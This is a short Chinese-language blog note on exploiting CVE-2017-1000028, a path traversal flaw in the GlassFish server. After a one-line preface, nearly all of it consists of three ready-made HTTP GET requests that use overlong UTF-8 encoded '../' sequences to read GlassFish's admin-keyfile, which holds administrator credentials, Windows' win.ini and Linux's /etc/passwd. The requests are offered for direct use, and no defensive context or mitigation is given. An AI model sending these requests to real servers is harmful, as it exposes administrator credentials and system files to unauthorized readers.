【笔记】CVE-2017-1000028漏洞利用

发表于 更新于 阅读次数:

前言

GlassFish任意文件读取漏洞
默认端口为4848

读取GlassFish用户名和密码

request
1
GET http://127.0.0.1:80/theme/META-INF/%c0.%c0./%c0.%c0./%c0.%c0./%c0.%c0./%c0.%c0./domains/domain1/config/admin-keyfile

读取Windows用户名和密码

request
1
GET http://127.0.0.1:80/theme/META-INF/prototype%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afwindows/win.ini

读取Linux用户名和密码

request
1
GET http://127.0.0.1:80/theme/META-INF/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd

完成